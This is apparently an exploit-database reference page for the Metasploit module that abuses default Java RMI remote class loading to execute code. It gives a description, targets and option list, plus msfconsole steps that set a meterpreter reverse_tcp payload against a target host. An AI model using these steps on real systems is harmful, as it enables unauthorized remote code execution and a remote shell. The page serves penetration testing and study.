Java RMI Server Insecure Default Configuration Java Code Execution | Metasploit Exploit Database (DB)

Java RMI Server Insecure Default Configuration Java Code Execution

This module takes advantage of the default configuration of the RMI Registry and RMI Activation services, which allow loading classes from any remote (HTTP) URL. As it invokes a method in the RMI Distributed Garbage Collector which is available via every RMI endpoint, it can be used against both rmiregistry and rmid, and against most other (custom) RMI endpoints as well. Note that it does not work against Java Management Extension (JMX) ports since those do not support remote class loading, unless another RMI endpoint is active in the same Java process. RMI method calls do not support or require any sort of authentication.

Search Other Modules


Exploit Rank

  • Excellent

Exploit Authors

  • mihi < >

Vulnerability References


Exploit Targets

  • 0 - Generic (Java Payload) (default)
  • 1 - Windows x86 (Native Payload)
  • 2 - Linux x86 (Native Payload)
  • 3 - Mac OS X PPC (Native Payload)
  • 4 - Mac OS X x86 (Native Payload)

Exploit Development


Similar Exploit Modules


Exploit Usage Information

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use exploit/multi/misc/java_rmi_server
msf exploit(java_rmi_server) > show payloads
msf exploit(java_rmi_server) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(java_rmi_server) > set LHOST [MY IP ADDRESS]
msf exploit(java_rmi_server) > set RHOST [TARGET IP]
msf exploit(java_rmi_server) > exploit


Exploit Module Options

RHOST The target address
RPORT The target port (default: 1099)
SRVHOST The local host to listen on. This must be an address on the local machine or 0.0.0.0 (default: 0.0.0.0)
SRVPORT The local port to listen on. (default: 8080)
SSLCert Path to a custom SSL certificate (default is randomly generated)
URIPATH The URI to use for this exploit (default is random)
CHOST The local client address
CPORT The local client port
ConnectTimeout Maximum number of seconds to establish a TCP connection
ContextInformationFile The information file that contains context information
DisablePayloadHandler Disable the handler code for the selected payload
EnableContextEncoding Use transient context when encoding payloads
ListenerComm The specific communication channel to use for this service
Proxies Use a proxy chain
SSL Negotiate SSL for outgoing connections
SSLVersion Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
VERBOSE Enable detailed status messages
WORKSPACE Specify the workspace for this module
HTTP::chunked Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
HTTP::compression Enable compression of HTTP responses via content encoding (accepted: none, gzip, deflate)
HTTP::header_folding Enable folding of HTTP headers
HTTP::junk_headers Enable insertion of random junk HTTP headers
HTTP::server_name Configures the Server header of all outgoing replies
TCP::max_send_size Maxiumum tcp segment size. (0 = disable)
TCP::send_delay Delays inserted before every send. (0 = disable)